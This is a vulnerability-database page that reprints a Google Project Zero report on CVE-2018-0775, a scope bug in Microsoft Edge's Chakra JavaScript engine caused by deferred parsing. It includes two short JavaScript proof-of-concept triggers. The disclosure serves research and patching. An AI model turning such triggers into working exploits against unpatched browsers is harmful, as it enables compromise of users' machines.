Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2018-0775

Publish Date: 18 Jan 2018

Author: Google Security Research, lokihardt

Source

                Microsoft Edge: Chakra: Deferred parsing makes wrong scopes #2

CVE-2018-0775


Since the PoC is only triggerable when the "DeferParse" flag enabled and requires a with statement, I think this is simillar to &lt;a href="/p/project-zero/issues/detail?id=1310" title="Microsoft Edge: Chakra: Deferred parsing makes wrong scopes" class="closed_ref" rel="nofollow"&gt; issue 1310 &lt;/a&gt;.

PoC:
// Enable the flag using '\n'.repeat(0x1000)
eval(`(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());` + '\n'.repeat(0x1000));

PoC 2:
// ./ch poc.js -ForceDeferParse
(function f() {
    with ({}) {
        (function () {
            print(f);
        })();
    }
}());


This bug is subject to a 90 day disclosure deadline. After 90 days elapse
or a patch has been made broadly available, the bug report will become
visible to the public.




Found by: lokihardt

<p>

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

Microsoft Edge Chakra Deferred Parsing

Vulmon Search

About

Products

Connect